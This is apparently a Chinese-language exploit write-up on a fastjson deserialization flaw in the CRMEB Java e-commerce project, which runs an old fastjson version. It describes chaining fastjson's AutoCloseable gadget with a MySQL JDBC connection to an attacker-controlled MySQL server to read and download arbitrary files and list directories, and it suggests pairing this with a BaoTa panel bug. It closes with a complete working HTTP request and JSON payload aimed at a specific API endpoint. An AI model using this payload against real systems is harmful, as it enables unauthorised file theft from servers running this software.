4.5K start 2K fork的项目,之前用了低版本的fastjson,新版本修复了。
https://gitee.com/ZhongBangKeJi/crmeb_java
之前用1.2.56版本fastjson,1.2.68公开的有fastjson commons-io AutoCloseable写任意文件,本地测payload没问题,真实场景利用不了
引用su18: https://github.com/su18/fastjson-commons-io/tree/e6724ac297e1aa7ae44a62a3ad6cc3f537d3c737
注意:由于 fastjson 获取 WriterOutputStream 的构造方法时并不唯一,所以这个 payload 并不是每次都能触发,需要等随机到带有指定参数的构造方法才能触发,测试的小伙伴多测几次就可以写入了。如果你有解决这个问题的办法请联系我。
springboot来说也有点鸡肋,在blackhat 2021有人提出了新的姿势:
https://blog.noah.360.net/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/
刚好可以配合mysql的jdbc,让fastjson主动去链接我的mysql,根据已学知识,我们在继续构造payload,再利用"allowUrlInLocalInfile":"true","allowLoadLocalInfile":"true","allowLoadLocalInfileInPath":"/",
可以构成任意文件读取&&任意文件下载,下载jar包,,利用file:// 可以做到列目录,再与宝塔漏洞再进行利用无敌。
show code:
POST /api/public/wechat/gitlab?token=aa HTTP/1.1 Host: 192.168.220.2:8081 Content-Length: 479 Request-Origion: SwaggerBootstrapUi Accept: */* X-Requested-With: XMLHttpRequest Authori-zation: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/json Origin: http://192.168.220.2:8081 Referer: http://192.168.220.2:8081/doc.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"xxxxx","portToConnectTo":1234,"databaseToConnectTo":"test","info": {"@type":"java.util.Properties","PORT":"1234", "allowUrlInLocalInfile":"true", "allowLoadLocalInfile":"true", "allowLoadLocalInfileInPath":"/", "maxAllowedPacket":"655360", "user":"fileread_file:///.","PORT.1":"1234","HOST.1":"xxxxxxxxx","NUM_HOSTS":"1","HOST":"xxxxx","DBNAME":"test"}
